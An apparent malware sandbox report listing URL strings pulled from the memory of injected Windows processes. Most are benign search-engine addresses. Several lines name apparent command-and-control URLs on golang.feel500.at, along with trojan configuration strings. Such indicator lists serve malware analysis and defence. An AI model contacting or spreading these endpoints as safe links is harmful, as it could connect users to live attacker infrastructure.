Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000018.00000003.388260705.0000027DF6B1B000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.377460662.000000000F6C0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: {76F37E5B-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr | String found in binary or memory: http://golang.feel500.at/api1/JqcXh8pdjCRNE_2Bo/k4G_2BpM24Ua/kAoQCjr_2Bh/ujHmQfZGFu_2F2/nA1tAcoG0Uwm
Source: {76F37E5D-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr, ~DFEC113D747FBB8244.TMP.10.dr | String found in binary or memory: http://golang.feel500.at/api1/MC0KUFyM/atN4YRJ4eGaVNgoEiHKk1sV/uZXY8dNFOC/5muSX5_2FgYBcb3Z0/Hw8SCE4g
Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmp | String found in binary or memory: http://golang.feel500.at/api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2
          Source: {76F37E5F-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr, ~DFCE9772CEB2FA999E.TMP.10.drString found in binary or memory: http://golang.feel500.at/api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2/FCqi
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: loaddll32.exe, 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: powershell.exe, 00000018.00000002.391291474.0000027D80001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: RuntimeBroker.exe, 00000027.00000002.584711407.0000017766D3A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.584681538.0000017766D2E000.00000004.00000001.sdmpString found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
